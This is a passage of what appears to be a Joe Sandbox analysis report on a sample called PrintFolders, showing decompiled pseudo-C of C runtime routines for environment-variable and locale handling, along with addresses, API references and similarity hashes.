															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x10017ea0 = E10008BFC(1, 4);
										E10008701(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x10017ea0 - _t110; // 0x16de908
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x10017ea4 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x10017ea4 = E10008BFC(1, 4);
												E10008701(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x10017ea4 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E10008701(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x10017ea4 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L10007358();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E10006406(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x1000a62a
0x1000a62d
0x1000a62f
0x1000a633
0x1000a636
0x1000a638
0x1000a64d
0x1000a652
0x1000a654
0x1000a659
0x1000a65e
0x1000a660
0x1000a841
0x1000a846
0x00000000
0x1000a666
0x1000a666
0x1000a668
0x00000000
0x1000a66e
0x1000a671
0x1000a674
0x1000a679
0x1000a67b
0x1000a681
0x1000a6fe
0x1000a6fe
0x1000a703
0x1000a706
0x1000a708
0x00000000
0x1000a70e
0x1000a715
0x1000a71a
0x1000a71f
0x1000a722
0x1000a724
0x1000a775
0x1000a775
0x1000a778
0x00000000
0x1000a77e
0x1000a77e
0x1000a780
0x1000a783
0x1000a783
0x1000a786
0x1000a788
0x00000000
0x1000a78e
0x1000a78e
0x1000a794
0x00000000
0x1000a79a
0x1000a7a4
0x1000a7a7
0x1000a7ac
0x1000a7af
0x1000a7b2
0x1000a7b4
0x00000000
0x1000a7ba
0x1000a7ba
0x1000a7bd
0x1000a7bf
0x1000a7c2
0x00000000
0x1000a7c2
0x1000a7b4
0x1000a794
0x1000a788
0x1000a726
0x1000a726
0x1000a728
0x00000000
0x1000a72a
0x1000a72d
0x1000a733
0x1000a736
0x1000a739
0x1000a76e
0x1000a770
0x1000a73b
0x1000a73b
0x1000a748
0x1000a748
0x1000a74b
0x00000000
0x00000000
0x1000a744
0x1000a747
0x1000a747
0x1000a747
0x1000a757
0x1000a75a
0x1000a75f
0x1000a762
0x1000a765
0x1000a767
0x1000a7c6
0x1000a7c6
0x1000a7c6
0x1000a767
0x1000a7cb
0x1000a7ce
0x00000000
0x1000a7d0
0x1000a7d0
0x1000a7d3
0x1000a7d3
0x1000a7d5
0x1000a7d6
0x1000a7d6
0x1000a7e2
0x1000a7ea
0x1000a7ed
0x1000a7ee
0x1000a7f0
0x1000a838
0x1000a839
0x00000000
0x1000a7f2
0x1000a7f9
0x1000a7fe
0x1000a801
0x1000a803
0x1000a85d
0x1000a85e
0x1000a85f
0x1000a860
0x1000a861
0x1000a862
0x1000a867
0x1000a86a
0x1000a86e
0x1000a86f
0x1000a872
0x1000a874
0x1000a87b
0x1000a87d
0x1000a87f
0x1000a881
0x1000a883
0x1000a883
0x1000a886
0x1000a887
0x1000a887
0x1000a883
0x1000a88d
0x1000a898
0x1000a89b
0x1000a89c
0x1000a89e
0x1000a906
0x1000a906
0x00000000
0x1000a8a0
0x1000a8a0
0x1000a8a2
0x1000a8a4
0x1000a8f6
0x1000a8f8
0x1000a8fe
0x00000000
0x1000a8a6
0x1000a8a6
0x1000a8a9
0x1000a8a9
0x1000a8ab
0x1000a8ab
0x1000a8ab
0x1000a8ae
0x1000a8ae
0x1000a8b0
0x1000a8b1
0x1000a8b1
0x1000a8b9
0x1000a8bd
0x1000a8c7
0x1000a8ca
0x1000a8cf
0x1000a8d2
0x1000a8d6
0x00000000
0x1000a8d8
0x1000a8e0
0x1000a8e5
0x1000a8e8
0x1000a8ea
0x1000a90b
0x1000a90d
0x1000a90e
0x1000a90f
0x1000a910
0x1000a911
0x1000a912
0x1000a917
0x1000a918
0x1000a91d
0x1000a923
0x1000a925
0x1000a926
0x1000a92c
0x00000000
0x1000a92c
0x1000a931
0x00000000
0x00000000
0x00000000
0x1000a8ea
0x00000000
0x1000a8ec
0x1000a8ec
0x1000a8ef
0x1000a8f1
0x1000a8f1
0x00000000
0x1000a8f5
0x1000a8a4
0x1000a876
0x1000a876
0x1000a876
0x1000a878
0x1000a87a
0x1000a87a
0x1000a805
0x1000a816
0x1000a81a
0x1000a826
0x1000a828
0x1000a82a
0x1000a82f
0x1000a82f
0x1000a832
0x1000a832
0x00000000
0x1000a828
0x1000a803
0x1000a7f0
0x1000a7ce
0x1000a728
0x1000a724
0x1000a683
0x1000a683
0x1000a686
0x1000a6a4
0x1000a6a4
0x1000a6a7
0x1000a6ba
0x1000a6bf
0x1000a6c4
0x1000a6c7
0x1000a6cd
0x1000a84c
0x1000a84c
0x1000a84c
0x00000000
0x1000a6d3
0x1000a6d3
0x1000a6d9
0x00000000
0x1000a6db
0x1000a6e5
0x1000a6ea
0x1000a6ef
0x1000a6f2
0x1000a6f8
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a6f8
0x1000a6d9
0x1000a6a9
0x1000a6a9
0x1000a84f
0x1000a850
0x1000a857
0x00000000
0x1000a859
0x1000a688
0x1000a688
0x1000a68e
0x00000000
0x1000a690
0x1000a695
0x1000a697
0x00000000
0x1000a69d
0x1000a69d
0x00000000
0x1000a69d
0x1000a697
0x1000a68e
0x1000a686
0x1000a681
0x1000a668
0x1000a63a
0x1000a63a
0x1000a63f
0x1000a645
0x1000a85a
0x1000a85c
0x1000a85c
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 1000A654
_free.LIBCMT ref: 1000A72D
_free.LIBCMT ref: 1000A75A

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: a0c36db041c6394aca0add2f8b723cd2806df39da9a9d26740de4ca1c8323699
Instruction ID: 381467da00f9b5958bd928ec2253f49b5b741610b1117f8a7471ff7dbb655abb
Opcode Fuzzy Hash: a0c36db041c6394aca0add2f8b723cd2806df39da9a9d26740de4ca1c8323699
Instruction Fuzzy Hash: 5F51F475904212AFFB10DF788C81A5E7BF4FF063D0B11826DE9149718AEB72DA81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00424C14 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00424C14(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00412C70(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E004135F1(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x450898 - _t110; // 0x16c5fa8
							if(__eflags != 0) {
								L14:
								_t64 =  *0x450898; // 0x16c5fa8
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00424F1C(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00424F7C(_t120, _t139, 4);
													E0041E2B8(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E0041E2B8( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00424F7C(_t139, _t138, 4);
												E0041E2B8(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x450898 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E0041E25B(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E0041E2B8(_t149);
													goto L40;
												} else {
													_t76 = E0041C7A8(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00413544();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E0041E25B(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00419C49(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E0041E2B8(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E0041E25B(_t53, 1);
																		E0041E2B8(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E0041C7A8( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00413544();
																				asm("int3");
																				_t84 =  *0x450898; // 0x16c5fa8
																				__eflags = _t84 -  *0x4508a4; // 0x16c5fa8
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x450898 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E0042B1C3(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E004135F1(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x450898 = E0041E25B(1, 4);
										E0041E2B8(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x450898 - _t110; // 0x16c5fa8
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x45089c - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x45089c = E0041E25B(1, 4);
												E0041E2B8(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x45089c - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E0041E2B8(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x45089c - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L0041A851();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E004135F1(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x00424c14
0x00424c17
0x00424c19
0x00424c1d
0x00424c20
0x00424c22
0x00424c37
0x00424c3c
0x00424c3e
0x00424c43
0x00424c48
0x00424c4a
0x00424e2b
0x00424e30
0x00000000
0x00424c50
0x00424c50
0x00424c52
0x00000000
0x00424c58
0x00424c5b
0x00424c5e
0x00424c63
0x00424c65
0x00424c6b
0x00424ce8
0x00424ce8
0x00424ced
0x00424cf0
0x00424cf2
0x00000000
0x00424cf8
0x00424cff
0x00424d04
0x00424d09
0x00424d0c
0x00424d0e
0x00424d5f
0x00424d5f
0x00424d62
0x00000000
0x00424d68
0x00424d68
0x00424d6a
0x00424d6d
0x00424d6d
0x00424d70
0x00424d72
0x00000000
0x00424d78
0x00424d78
0x00424d7e
0x00000000
0x00424d84
0x00424d8e
0x00424d91
0x00424d96
0x00424d99
0x00424d9c
0x00424d9e
0x00000000
0x00424da4
0x00424da4
0x00424da7
0x00424da9
0x00424dac
0x00000000
0x00424dac
0x00424d9e
0x00424d7e
0x00424d72
0x00424d10
0x00424d10
0x00424d12
0x00000000
0x00424d14
0x00424d17
0x00424d1d
0x00424d20
0x00424d23
0x00424d58
0x00424d5a
0x00424d25
0x00424d25
0x00424d32
0x00424d32
0x00424d35
0x00000000
0x00000000
0x00424d2e
0x00424d31
0x00424d31
0x00424d31
0x00424d41
0x00424d44
0x00424d49
0x00424d4c
0x00424d4f
0x00424d51
0x00424db0
0x00424db0
0x00424db0
0x00424d51
0x00424db5
0x00424db8
0x00000000
0x00424dba
0x00424dba
0x00424dbd
0x00424dbd
0x00424dbf
0x00424dc0
0x00424dc0
0x00424dcc
0x00424dd4
0x00424dd7
0x00424dd8
0x00424dda
0x00424e22
0x00424e23
0x00000000
0x00424ddc
0x00424de3
0x00424de8
0x00424deb
0x00424ded
0x00424e47
0x00424e48
0x00424e49
0x00424e4a
0x00424e4b
0x00424e4c
0x00424e51
0x00424e54
0x00424e58
0x00424e59
0x00424e5c
0x00424e5e
0x00424e65
0x00424e67
0x00424e69
0x00424e6b
0x00424e6d
0x00424e6d
0x00424e70
0x00424e71
0x00424e71
0x00424e6d
0x00424e77
0x00424e82
0x00424e85
0x00424e86
0x00424e88
0x00424ef0
0x00424ef0
0x00000000
0x00424e8a
0x00424e8a
0x00424e8c
0x00424e8e
0x00424ee0
0x00424ee2
0x00424ee8
0x00000000
0x00424e90
0x00424e90
0x00424e93
0x00424e93
0x00424e95
0x00424e95
0x00424e95
0x00424e98
0x00424e98
0x00424e9a
0x00424e9b
0x00424e9b
0x00424ea3
0x00424ea7
0x00424eb1
0x00424eb4
0x00424eb9
0x00424ebc
0x00424ec0
0x00000000
0x00424ec2
0x00424eca
0x00424ecf
0x00424ed2
0x00424ed4
0x00424ef5
0x00424ef7
0x00424ef8
0x00424ef9
0x00424efa
0x00424efb
0x00424efc
0x00424f01
0x00424f02
0x00424f07
0x00424f0d
0x00424f0f
0x00424f10
0x00424f16
0x00000000
0x00424f16
0x00424f1b
0x00000000
0x00000000
0x00000000
0x00424ed4
0x00000000
0x00424ed6
0x00424ed6
0x00424ed9
0x00424edb
0x00424edb
0x00000000
0x00424edf
0x00424e8e
0x00424e60
0x00424e60
0x00424e60
0x00424e62
0x00424e64
0x00424e64
0x00424def
0x00424e00
0x00424e04
0x00424e10
0x00424e12
0x00424e14
0x00424e19
0x00424e19
0x00424e1c
0x00424e1c
0x00000000
0x00424e12
0x00424ded
0x00424dda
0x00424db8
0x00424d12
0x00424d0e
0x00424c6d
0x00424c6d
0x00424c70
0x00424c8e
0x00424c8e
0x00424c91
0x00424ca4
0x00424ca9
0x00424cae
0x00424cb1
0x00424cb7
0x00424e36
0x00424e36
0x00424e36
0x00000000
0x00424cbd
0x00424cbd
0x00424cc3
0x00000000
0x00424cc5
0x00424ccf
0x00424cd4
0x00424cd9
0x00424cdc
0x00424ce2
0x00000000
0x00000000
0x00000000
0x00000000
0x00424ce2
0x00424cc3
0x00424c93
0x00424c93
0x00424e39
0x00424e3a
0x00424e41
0x00000000
0x00424e43
0x00424c72
0x00424c72
0x00424c78
0x00000000
0x00424c7a
0x00424c7f
0x00424c81
0x00000000
0x00424c87
0x00424c87
0x00000000
0x00424c87
0x00424c81
0x00424c78
0x00424c70
0x00424c6b
0x00424c52
0x00424c24
0x00424c24
0x00424c29
0x00424c2f
0x00424e44
0x00424e46
0x00424e46
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00424C3E
_free.LIBCMT ref: 00424D17
_free.LIBCMT ref: 00424D44

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 4e14be396917b90d40ada6c8054fde6103272dd0e98e2066e88c24aaefcf9db6
Instruction ID: c24dd6349b25f5b46de012d200697a2dc7ab1927184a9c428c04661f96352079
Opcode Fuzzy Hash: 4e14be396917b90d40ada6c8054fde6103272dd0e98e2066e88c24aaefcf9db6
Instruction Fuzzy Hash: CB510E70B04321AFEB21BF75A851ABE7BE8EF81314F81416FE91497281DB3D85418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9D5 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040EA1E
__alloca_probe_16.LIBCMT ref: 0040EA4A
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040EA89
LCMapStringEx.KERNEL32 ref: 0040EAA6
LCMapStringEx.KERNEL32 ref: 0040EAE5
__alloca_probe_16.LIBCMT ref: 0040EB02
LCMapStringEx.KERNEL32 ref: 0040EB44
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040EB67

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: dbe60554392ac3eae939534d336e4110778e17a30d238082d0c9db6a49dad1a4
Instruction ID: bae1dc4957788a08111944ff1eaf9dbc1280390a613fb653b58dfa13e10e978f
Opcode Fuzzy Hash: dbe60554392ac3eae939534d336e4110778e17a30d238082d0c9db6a49dad1a4
Instruction Fuzzy Hash: 6351A172600205ABEF209F62CC45FAB7BB9EB44750F15483AFD05A62D0D778ED21CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041BEFC Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E0041BEFC(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0x43d054; // 0x7bd02ead
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E0041CB63(__ecx, __edx) + 0x278;
				_t163 = E0041B5E7(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x2
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E0041ED2F(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E00421491(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E00413544();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E0041E821(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E0041B304(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E00421875(__eflags, _v704, 1, 0x431520, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E00410C5A( &_v528,  *0x43d1c4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x4315a8; // 0x40b230
									 *0x42e234(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x43d290;
										if(_t232 == 0x43d290) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E0041E2B8( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E0041E2B8( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E0041E2B8( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
